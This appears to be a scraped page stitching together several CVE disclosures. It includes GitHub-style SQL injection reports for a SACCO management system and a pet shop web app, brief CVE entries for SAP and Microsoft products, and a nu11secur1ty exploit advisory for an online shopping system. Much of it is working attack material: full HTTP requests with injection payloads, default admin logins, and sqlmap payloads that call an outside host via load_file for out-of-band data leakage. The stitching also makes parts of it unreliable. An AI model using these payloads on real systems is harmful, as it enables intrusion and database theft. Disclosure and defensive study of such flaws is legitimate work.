Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_plan.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: H1dd3n

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_plan

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_plan, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_plan HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41532: bug_report/SQLi-1.md at main · yueleve/bug_report

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_borrower.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: H1dd3n

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_borrower

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_borrower, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_borrower HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41530: bug_report/SQLi-2.md at main · yueleve/bug_report

Online Pet Shop We App v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /admin/?page=orders/view_order.

**Online Pet Shop We App v1.0 by oretnom23 has SQL injection**

BUG\_Author: Cokutau-CH

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14839/online-pet-shop-we-app-using-php-and-paypal-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /pet\_shop/admin/?page=orders/view\_order&id=

Vulnerability location: /pet\_shop/admin/?page=orders/view\_order&id=,id

dbname=pet\_shop\_db,length=11

\[+\] Payload: /pet\_shop/admin/?page=orders/view\_order&id=-2%27%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ // Leak place ---> id

GET /pet\_shop/admin/?page\=orders/view\_order&id\=\-2%27%20union%20select%201,2,database(),4,5,6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=39d40bnp4n4treun1nco3uocnm
Connection: close

CVE-2022-41407: Bug_report/SQLi-2.md at main · CokuTau-CH/Bug_report

SAP SQL Anywhere - version 17.0, and SAP IQ - version 16.1, allows an attacker to leverage logical errors in memory management to cause a memory corruption, such as Stack-based buffer overflow.

CVE-2022-35299

Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-37982.

CVE-2022-38031

Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-38031.

CVE-2022-37982

Authenticated (admin+) Reflected Cross-Site Scripting (XSS) vulnerability in Gabe Livan's Asset CleanUp: Page Speed Booster plugin <= 1.3.8.4 at WordPress.

CVE-2021-36899: Asset CleanUp: Page Speed Booster

**How could an attacker exploit this vulnerability?**

An attacker could exploit the vulnerability by tricking an authenticated user into attempting to connect to a malicious SQL server via OLEDB, which could result in the server receiving a malicious networking packet. This could allow the attacker to execute code remotely on the client.

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

\*\* RESERVED \*\* This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

Assigning CNA

N/A

Date Record Created

**20220808**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20220808)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2022-38031: Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

CVE-2022-37982: Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability

Online Shopping System Advanced version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    The online-shopping-system-advanced-1.0 suffers from multiple SQLiThe attacker can steal all information from the database of this system.Status: CRITICAL[+] Exploit:```MYSQLParameter: cid (POST)    Type: boolean-based blind    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''OR NOT 4084=4084 AND 'icSi'='icSi    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT(ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN    Type: UNION query    Title: MySQL UNION query (NULL) - 4 columns    Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#```--------------------------------------------------------------------------------------------```MYSQLParameter: password (POST)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT(ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on````--------------------------------------------------------------------------------------------```MYSQL```## And more:```txt[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cidparameter]][1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cidparameter]][1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php[password parameter]][1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [pparameter]][1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [pparameter]][1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php[email parameter]][1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [nameparameter]]```PoC:https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>

Tag

#sql